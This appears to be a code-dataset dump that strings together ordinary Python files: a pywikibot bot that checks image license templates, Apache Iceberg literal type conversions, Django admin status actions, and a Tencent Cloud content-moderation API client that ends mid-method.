self.head_used = head_2
self.imagestatus_used = imagestatus
self.name_used = name
self.summary_used = summary
self.mex_used = mexCatched
break
elif find_tipe.lower() == 'find':
if re.findall(r'{}'.format(k.lower()),
self.imageCheckText.lower()):
self.some_problem = True
self.text_used = text
self.head_used = head_2
self.imagestatus_used = imagestatus
self.name_used = name
self.summary_used = summary
self.mex_used = mexCatched
continue
def checkStep(self) -> None:
"""Check a single file page."""
# something = Minimal requirements for an image description.
# If this fits, no tagging will take place
# (if there aren't other issues)
        # The MIT license is ok on the Italian Wikipedia, so keep this here too
# Don't put "}}" here, please. Useless and can give problems.
something = ['{{']
# Allowed extensions
try:
allowed_formats = self.site.siteinfo.get(
'fileextensions', get_default=False)
except KeyError:
allowed_formats = []
else:
allowed_formats = [item['ext'].lower() for item in allowed_formats]
brackets = False
delete = False
notification = None
# get the extension from the image's name
extension = self.imageName.split('.')[-1]
# Load the notification messages
HiddenTN = i18n.translate(self.site, HiddenTemplateNotification)
self.unvertext = i18n.translate(self.site, n_txt)
di = i18n.translate(self.site, delete_immediately)
# The header of the Unknown extension's message.
dih = i18n.twtranslate(self.site, 'checkimages-unknown-extension-head')
        # Text that will be added if the bot finds an unknown extension.
din = i18n.twtranslate(self.site,
'checkimages-unknown-extension-msg') + ' ~~~~'
        # Header that the bot will add if the image doesn't have a license.
nh = i18n.twtranslate(self.site, 'checkimages-no-license-head')
# Summary of the delete immediately.
dels = i18n.twtranslate(self.site, 'checkimages-deletion-comment')
nn = i18n.translate(self.site, nothing_notification)
smwl = i18n.translate(self.site, second_message_without_license)
try:
self.imageCheckText = self.image.get()
except NoPageError:
pywikibot.output('Skipping {} because it has been deleted.'
.format(self.imageName))
return
except IsRedirectPageError:
pywikibot.output("Skipping {} because it's a redirect."
.format(self.imageName))
return
# Delete the fields where the templates cannot be loaded
regex_nowiki = re.compile(r'<nowiki>(.*?)</nowiki>', re.DOTALL)
regex_pre = re.compile(r'<pre>(.*?)</pre>', re.DOTALL)
self.imageCheckText = regex_nowiki.sub('', self.imageCheckText)
self.imageCheckText = regex_pre.sub('', self.imageCheckText)
        # Delete the useless templates from the description (before anything
        # is added to the page the original text will be reloaded, don't worry).
if self.isTagged():
printWithTimeZone('{} is already tagged...'.format(self.imageName))
return
# something is the array with {{, MIT License and so on.
for a_word in something:
if a_word in self.imageCheckText:
# There's a template, probably a license
brackets = True
        # Is the extension allowed? (is it an image or e.g. a .xls file?)
if allowed_formats and extension.lower() not in allowed_formats:
delete = True
(license_found, hiddenTemplateFound) = self.smartDetection()
# Here begins the check block.
if brackets and license_found:
return
if delete:
pywikibot.output('{} is not a file!'.format(self.imageName))
if not di:
pywikibot.output('No localized message given for '
"'delete_immediately'. Skipping.")
return
# Some formatting for delete immediately template
dels = dels % {'adding': di}
di = '\n' + di
# Modify summary text
config.default_edit_summary = dels
canctext = di % extension
notification = din % {'file': self.image.title(as_link=True,
textlink=True)}
head = dih
self.report(canctext, self.imageName, notification, head)
return
if not self.imageCheckText.strip(): # empty image description
pywikibot.output(
"The file's description for {} does not contain a license "
                'template!'.format(self.imageName))
if hiddenTemplateFound and HiddenTN:
notification = HiddenTN % self.imageName
elif nn:
notification = nn % self.imageName
head = nh
self.report(self.unvertext, self.imageName, notification, head,
smwl)
return
pywikibot.output('{} has only text and not the specific '
'license...'.format(self.imageName))
if hiddenTemplateFound and HiddenTN:
notification = HiddenTN % self.imageName
elif nn:
notification = nn % self.imageName
head = nh
self.report(self.unvertext, self.imageName, notification, head, smwl)
def main(*args: str) -> bool:
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
:param args: command line arguments
"""
# Command line configurable parameters
    repeat = True # Restart after having checked all the images?
    limit = 80 # How many images to check?
    time_sleep = 30 # How many seconds to sleep after the check?
    skip_number = 0 # How many images to skip before checking?
    waitTime = 0 # How many seconds to sleep before the check?
    commonsActive = False # Is there an image with the same name at Commons?
normal = False # Check the new images or use another generator?
urlUsed = False # Use the url-related function instead of the new-pages
regexGen = False # Use the regex generator
duplicatesActive = False # Use the duplicate option
duplicatesReport = False # Use the duplicate-report option
max_user_notify = None
sendemailActive = False # Use the send-email
logFullError = True # Raise an error when the log is full
generator = None
unknown = [] # unknown parameters
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
# Here below there are the local parameters.
for arg in local_args:
option, _, value = arg.partition(':')
if option == '-limit':
limit = int(value or pywikibot.input(
'How many files do you want to check?'))
elif option == '-sleep':
time_sleep = int(value or pywikibot.input(
'How many seconds do you want runs to be apart?'))
elif option == '-break':
repeat = False
elif option == '-nologerror':
logFullError = False
elif option == '-commons':
commonsActive = True
elif option == '-duplicatesreport':
duplicatesReport = True
elif option == '-duplicates':
duplicatesActive = True
duplicates_rollback = int(value or 1)
elif option == '-maxusernotify':
max_user_notify = int(value or pywikibot.input(
'What should be the maximum number of notifications per user '
'per check?'))
elif option == '-sendemail':
sendemailActive = True
elif option == '-skip':
skip_number = int(value or pywikibot.input(
'How many files do you want to skip?'))
elif option == '-wait':
waitTime = int(value or pywikibot.input(
                'How long do you want to wait before checking the '
'files?'))
elif option == '-start':
firstPageTitle = value or pywikibot.input(
'From which page do you want to start?')
namespaces = tuple(
ns + ':' for ns in site.namespace(Namespace.FILE, True))
if firstPageTitle.startswith(namespaces):
firstPageTitle = firstPageTitle.split(':', 1)[1]
generator = site.allimages(start=firstPageTitle)
repeat = False
elif option == '-page':
regexPageName = value or pywikibot.input(
'Which page do you want to use for the regex?')
repeat = False
regexGen = True
elif option == '-url':
regexPageUrl = value or pywikibot.input(
'Which url do you want to use for the regex?')
urlUsed = True
repeat = False
regexGen = True
elif option == '-regex':
regexpToUse = value or pywikibot.input(
'Which regex do you want to use?')
generator = 'regex'
repeat = False
elif option == '-cat':
cat_name = value or pywikibot.input('In which category do I work?')
cat = pywikibot.Category(site, 'Category:' + cat_name)
generator = cat.articles(namespaces=[6])
repeat = False
elif option == '-ref':
ref_name = value or pywikibot.input(
'The references of what page should I parse?')
ref = pywikibot.Page(site, ref_name)
generator = ref.getReferences(namespaces=[6])
repeat = False
else:
unknown.append(arg)
if not generator:
normal = True
# Ensure that the bot is localized and right command args are given
if site.code not in project_inserted:
additional_text = ('Your project is not supported by this script.\n'
'To allow your project in the script you have to '
'add a localization into the script and add your '
'project to the "project_inserted" list!')
else:
additional_text = ''
if suggest_help(unknown_parameters=unknown,
additional_text=additional_text):
return False
# Reading the log of the new images if another generator is not given.
if normal:
if limit == 1:
pywikibot.output('Retrieving the latest file for checking...')
else:
pywikibot.output('Retrieving the latest {} files for checking...'
.format(limit))
while True:
        # Define the main bot class.
Bot = checkImagesBot(site, sendemailActive=sendemailActive,
duplicatesReport=duplicatesReport,
logFullError=logFullError,
max_user_notify=max_user_notify)
if normal:
generator = pg.NewimagesPageGenerator(total=limit, site=site)
# if urlUsed and regexGen, get the source for the generator
if urlUsed and regexGen:
textRegex = site.getUrl(regexPageUrl, no_hostname=True)
# Not an url but a wiki page as "source" for the regex
elif regexGen:
pageRegex = pywikibot.Page(site, regexPageName)
try:
textRegex = pageRegex.get()
except NoPageError:
pywikibot.output("{} doesn't exist!".format(pageRegex.title()))
textRegex = '' # No source, so the bot will quit later.
        # If the generator is the regex one, build a custom generator from a URL
        # or a page and a regex.
if generator == 'regex' and regexGen:
generator = Bot.regexGenerator(regexpToUse, textRegex)
Bot.takesettings()
if waitTime > 0:
generator = Bot.wait(generator, waitTime)
for image in generator:
# Setting the image for the main class
Bot.setParameters(image)
if skip_number and Bot.skipImages(skip_number, limit):
continue
# Check on commons if there's already an image with the same name
if commonsActive and site.family.name != 'commons':
if not Bot.checkImageOnCommons():
continue
# Check if there are duplicates of the image on the project
if duplicatesActive:
if not Bot.checkImageDuplicated(duplicates_rollback):
continue
Bot.checkStep()
if repeat:
            pywikibot.output('Waiting for {} seconds.'.format(time_sleep))
pywikibot.sleep(time_sleep)
else:
break
return True
if __name__ == '__main__':
start = time.time()
ret = False
try:
ret = main()
except KeyboardInterrupt:
ret = True
finally:
if ret is not False:
final = time.time()
delta = int(final - start)
pywikibot.output('Execution time: {} seconds\n'.format(delta))
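# Illustrative sketch (not part of the original script): the option-parsing
# pattern used throughout main() above. Each argument such as "-limit:25" is
# split with str.partition(':'); an empty value falls back to an interactive
# prompt (pywikibot.input in the real script, a stub callable here).
def _demo_option_parsing():
    def parse_limit(arg, prompt=lambda msg: '80'):
        option, _, value = arg.partition(':')
        if option == '-limit':
            return int(value or prompt('How many files do you want to check?'))
        return None
    assert parse_limit('-limit:25') == 25  # explicit value wins
    assert parse_limit('-limit') == 80     # empty value falls back to the prompt
    assert parse_limit('-break') is None   # unrelated options are handled elsewhere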
| 42.243917
| 79
| 0.552727
|
e8a9fa591534a096f0efd866ca602bf262a89d5d
| 17,323
|
py
|
Python
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 58
|
2019-09-10T20:51:26.000Z
|
2022-03-22T11:06:09.000Z
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 37
|
2019-11-03T19:19:44.000Z
|
2022-03-17T01:03:34.000Z
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 26
|
2019-08-28T23:59:03.000Z
|
2022-03-04T08:54:08.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
from decimal import (Decimal,
ROUND_HALF_UP)
import uuid
import pytz
from .expression import (FALSE,
TRUE)
from .java_variables import (JAVA_MAX_FLOAT,
JAVA_MIN_FLOAT)
from ..types.type import TypeID
class Literals(object):
EPOCH = datetime.datetime.utcfromtimestamp(0)
EPOCH_DAY = EPOCH.date()
@staticmethod # noqa: C901
def from_(value):
if value is None:
raise RuntimeError("Cannot create an expression literal from None")
if isinstance(value, bool):
return BooleanLiteral(value)
elif isinstance(value, int):
if Literal.JAVA_MIN_INT < value < Literal.JAVA_MAX_INT:
return IntegerLiteral(value)
return LongLiteral(value)
elif isinstance(value, float):
if Literal.JAVA_MIN_FLOAT < value < Literal.JAVA_MAX_FLOAT:
return FloatLiteral(value)
return DoubleLiteral(value)
elif isinstance(value, str):
return StringLiteral(value)
elif isinstance(value, uuid.UUID):
return UUIDLiteral(value)
elif isinstance(value, bytearray):
return BinaryLiteral(value)
elif isinstance(value, bytes):
return FixedLiteral(value)
elif isinstance(value, Decimal):
return DecimalLiteral(value)
else:
raise RuntimeError("Unimplemented Type Literal")
@staticmethod
def above_max():
return ABOVE_MAX
@staticmethod
def below_min():
return BELOW_MIN
class Literal(object):
JAVA_MAX_INT = 2147483647
JAVA_MIN_INT = -2147483648
JAVA_MAX_FLOAT = 3.4028235E38
JAVA_MIN_FLOAT = -3.4028235E38
@staticmethod # noqa: C901
def of(value):
if isinstance(value, bool):
return BooleanLiteral(value)
elif isinstance(value, int):
if value < Literal.JAVA_MIN_INT or value > Literal.JAVA_MAX_INT:
return LongLiteral(value)
return IntegerLiteral(value)
elif isinstance(value, float):
if value < Literal.JAVA_MIN_FLOAT or value > Literal.JAVA_MAX_FLOAT:
return DoubleLiteral(value)
return FloatLiteral(value)
elif isinstance(value, str):
return StringLiteral(value)
elif isinstance(value, uuid.UUID):
return UUIDLiteral(value)
elif isinstance(value, bytes):
return FixedLiteral(value)
elif isinstance(value, bytearray):
return BinaryLiteral(value)
elif isinstance(value, Decimal):
return DecimalLiteral(value)
def to(self, type):
raise NotImplementedError()
class BaseLiteral(Literal):
def __init__(self, value):
self.value = value
def to(self, type):
raise NotImplementedError()
def __eq__(self, other):
if id(self) == id(other):
return True
elif other is None or not isinstance(other, BaseLiteral):
return False
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "BaseLiteral(%s)" % str(self.value)
def __str__(self):
return str(self.value)
class ComparableLiteral(BaseLiteral):
def __init__(self, value):
super(ComparableLiteral, self).__init__(value)
def to(self, type):
raise NotImplementedError()
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if self.value is None:
return True
if other is None or other.value is None:
return False
return self.value < other.value
def __gt__(self, other):
if self.value is None:
return False
if other is None or other.value is None:
return True
return self.value > other.value
def __le__(self, other):
if self.value is None:
return True
if other is None or other.value is None:
return False
return self.value <= other.value
def __ge__(self, other):
if self.value is None:
return False
if other is None or other.value is None:
return True
return self.value >= other.value
class AboveMax(Literal):
def __init__(self):
super(AboveMax, self).__init__()
def value(self):
raise RuntimeError("AboveMax has no value")
def to(self, type):
raise RuntimeError("Cannot change the type of AboveMax")
def __str__(self):
return "aboveMax"
class BelowMin(Literal):
def __init__(self):
super(BelowMin, self).__init__()
def value(self):
raise RuntimeError("BelowMin has no value")
def to(self, type):
raise RuntimeError("Cannot change the type of BelowMin")
def __str__(self):
return "belowMin"
class BooleanLiteral(ComparableLiteral):
def __init__(self, value):
super(BooleanLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.BOOLEAN:
return self
class IntegerLiteral(ComparableLiteral):
def __init__(self, value):
super(IntegerLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.INTEGER:
return self
elif type_var.type_id == TypeID.LONG:
return LongLiteral(self.value)
elif type_var.type_id == TypeID.FLOAT:
return FloatLiteral(float(self.value))
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(float(self.value))
elif type_var.type_id == TypeID.DATE:
return DateLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class LongLiteral(ComparableLiteral):
def __init__(self, value):
super(LongLiteral, self).__init__(value)
def to(self, type_var): # noqa: C901
if type_var.type_id == TypeID.INTEGER:
if Literal.JAVA_MAX_INT < self.value:
return ABOVE_MAX
elif Literal.JAVA_MIN_INT > self.value:
return BELOW_MIN
return IntegerLiteral(self.value)
elif type_var.type_id == TypeID.LONG:
return self
elif type_var.type_id == TypeID.FLOAT:
return FloatLiteral(float(self.value))
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(float(self.value))
elif type_var.type_id == TypeID.TIME:
return TimeLiteral(self.value)
elif type_var.type_id == TypeID.TIMESTAMP:
return TimestampLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class FloatLiteral(ComparableLiteral):
def __init__(self, value):
super(FloatLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FLOAT:
return self
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class DoubleLiteral(ComparableLiteral):
def __init__(self, value):
super(DoubleLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FLOAT:
if JAVA_MAX_FLOAT < self.value:
return ABOVE_MAX
elif JAVA_MIN_FLOAT > self.value:
return BELOW_MIN
return FloatLiteral(self.value)
elif type_var.type_id == TypeID.DOUBLE:
return self
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class DateLiteral(ComparableLiteral):
def __init__(self, value):
super(DateLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.DATE:
return self
class TimeLiteral(ComparableLiteral):
def __init__(self, value):
super(TimeLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.TIME:
return self
class TimestampLiteral(ComparableLiteral):
def __init__(self, value):
super(TimestampLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.TIMESTAMP:
return self
elif type_var.type_id == TypeID.DATE:
return DateLiteral((datetime.datetime.fromtimestamp(self.value / 1000000) - Literals.EPOCH).days)
class DecimalLiteral(ComparableLiteral):
def __init__(self, value):
super(DecimalLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.DECIMAL and type_var.scale == abs(self.value.as_tuple().exponent):
return self
class StringLiteral(BaseLiteral):
def __init__(self, value):
super(StringLiteral, self).__init__(value)
def to(self, type_var): # noqa: C901
import dateutil.parser
if type_var.type_id == TypeID.DATE:
return DateLiteral((dateutil.parser.parse(self.value) - Literals.EPOCH).days)
elif type_var.type_id == TypeID.TIME:
return TimeLiteral(
int((dateutil.parser.parse(Literals.EPOCH.strftime("%Y-%m-%d ") + self.value) - Literals.EPOCH)
.total_seconds() * 1000000))
elif type_var.type_id == TypeID.TIMESTAMP:
timestamp = dateutil.parser.parse(self.value)
EPOCH = Literals.EPOCH
if bool(timestamp.tzinfo) != bool(type_var.adjust_to_utc):
raise RuntimeError("Cannot convert to %s when string is: %s" % (type_var, self.value))
if timestamp.tzinfo is not None:
EPOCH = EPOCH.replace(tzinfo=pytz.UTC)
return TimestampLiteral(int((timestamp - EPOCH).total_seconds() * 1000000))
elif type_var.type_id == TypeID.STRING:
return self
elif type_var.type_id == TypeID.UUID:
return UUIDLiteral(uuid.UUID(self.value))
elif type_var.type_id == TypeID.DECIMAL:
dec_val = Decimal(str(self.value))
if abs(dec_val.as_tuple().exponent) == type_var.scale:
if type_var.scale == 0:
return DecimalLiteral(Decimal(str(self.value))
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(str(self.value))
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
def __eq__(self, other):
if id(self) == id(other):
return True
if other is None or not isinstance(other, StringLiteral):
return False
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
def __str__(self):
return '"' + self.value + '"'
class UUIDLiteral(ComparableLiteral):
def __init__(self, value):
super(UUIDLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.UUID:
return self
class FixedLiteral(BaseLiteral):
def __init__(self, value):
super(FixedLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FIXED:
if len(self.value) == type_var.length:
return self
elif type_var.type_id == TypeID.BINARY:
return BinaryLiteral(self.value)
def write_replace(self):
return FixedLiteralProxy(self.value)
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
class BinaryLiteral(BaseLiteral):
def __init__(self, value):
super(BinaryLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FIXED:
if type_var.length == len(self.value):
return FixedLiteral(self.value)
return None
elif type_var.type_id == TypeID.BINARY:
return self
def write_replace(self):
return BinaryLiteralProxy(self.value)
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
class FixedLiteralProxy(object):
def __init__(self, buffer=None):
if buffer is not None:
self.bytes = list(buffer)
def read_resolve(self):
return FixedLiteral(self.bytes)
class ConstantExpressionProxy(object):
def __init__(self, true_or_false=None):
if true_or_false is not None:
self.true_or_false = true_or_false
def read_resolve(self):
if self.true_or_false:
return TRUE
else:
return FALSE
class BinaryLiteralProxy(FixedLiteralProxy):
def __init__(self, buffer=None):
super(BinaryLiteralProxy, self).__init__(buffer)
def read_resolve(self):
return BinaryLiteral(self.bytes)
ABOVE_MAX = AboveMax()
BELOW_MIN = BelowMin()
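# Illustrative sketch (not part of the upstream module): how Literal.of picks a
# wrapper class from the Python value's type and the Java int/float ranges.
# Only classes defined above are used.
def _demo_literal_of():
    assert isinstance(Literal.of(True), BooleanLiteral)
    assert isinstance(Literal.of(5), IntegerLiteral)            # fits in a Java int
    assert isinstance(Literal.of(2 ** 40), LongLiteral)         # exceeds the Java int range
    assert isinstance(Literal.of(1.5), FloatLiteral)
    assert isinstance(Literal.of(1e40), DoubleLiteral)          # exceeds the Java float range
    assert isinstance(Literal.of("iceberg"), StringLiteral)
    assert isinstance(Literal.of(Decimal("3.14")), DecimalLiteral)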
| 29.867241
| 122
| 0.594585
|
507e0de3ef81e8e585298c6980bf3745630f69a2
| 800
|
py
|
Python
|
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
from django.utils.translation import ugettext_lazy as _
from snippets.choices import StatusChoices
def activate(modeladmin, request, queryset):
queryset.update(is_active=True)
activate.short_description = _('Активировать')
def deactivate(modeladmin, request, queryset):
queryset.update(is_active=False)
deactivate.short_description = _('Деактивировать')
def draft(modeladmin, request, queryset):
queryset.update(status=StatusChoices.DRAFT.value)
draft.short_description = _('В черновики')
def hide(modeladmin, request, queryset):
queryset.update(status=StatusChoices.HIDDEN.value)
hide.short_description = _('Скрыть')
def publish(modeladmin, request, queryset):
queryset.update(status=StatusChoices.PUBLIC.value)
publish.short_description = _('Опубликовать')
| 20.512821
| 55
| 0.78
|
9d5e01a5bdfe49b336d70a90fa40c43f539b3e18
| 377
|
py
|
Python
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 245
|
2020-10-05T14:52:37.000Z
|
2022-03-29T07:40:38.000Z
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 521
|
2020-10-05T15:25:29.000Z
|
2021-11-09T13:24:01.000Z
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 521
|
2020-10-05T15:29:42.000Z
|
2022-03-27T10:22:00.000Z
|
st = []
def push_digits(number):
    while number != 0:
        st.append(number % 10)
        number = int(number / 10)
def reverse_number(number):
    push_digits(number)
    reverse = 0
    i = 1
    while len(st) > 0:
        reverse = reverse + (st[len(st) - 1] * i)
        st.pop()
        i = i * 10
    return reverse
number = int(input())
print(reverse_number(number))
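# Illustrative worked example (not part of the original snippet): reversing 120
# pushes [0, 2, 1] onto the stack and rebuilds 1*1 + 2*10 + 0*100 = 21, so
# trailing zeros of the input are dropped, as expected for integer reversal.
assert reverse_number(120) == 21
assert reverse_number(4321) == 1234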
| 13.464286
| 45
| 0.562334
|
2ac3bf1013fb97d41b6e3eb5ad94045c0c1c98da
| 10,286
|
py
|
Python
|
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | 1
|
2019-07-16T08:45:02.000Z
|
2019-07-16T08:45:02.000Z
|
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | null | null | null |
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.cms.v20190321 import models
class CmsClient(AbstractClient):
_apiVersion = '2019-03-21'
_endpoint = 'cms.tencentcloudapi.com'
def AudioModeration(self, request):
"""音频内容检测(Audio Moderation, AM)服务使用了波形分析、声纹分析等技术,能识别涉黄、涉政、涉恐等违规音频,同时支持用户配置音频黑库,打击自定义的违规内容。
:param request: 调用AudioModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.AudioModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.AudioModerationResponse`
"""
try:
params = request._serialize()
body = self.call("AudioModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AudioModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateTextSample(self, request):
"""新增文本类型样本库
:param request: 调用CreateTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.CreateTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.CreateTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteTextSample(self, request):
"""删除文字样本库,暂时只支持单个删除
:param request: 调用DeleteTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DeleteTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DeleteTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeModerationOverview(self, request):
"""根据日期,渠道和服务类型查询识别结果概览数据
:param request: 调用DescribeModerationOverview所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DescribeModerationOverviewRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DescribeModerationOverviewResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeModerationOverview", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeModerationOverviewResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeTextSample(self, request):
"""支持批量查询文字样本库
:param request: 调用DescribeTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DescribeTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DescribeTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
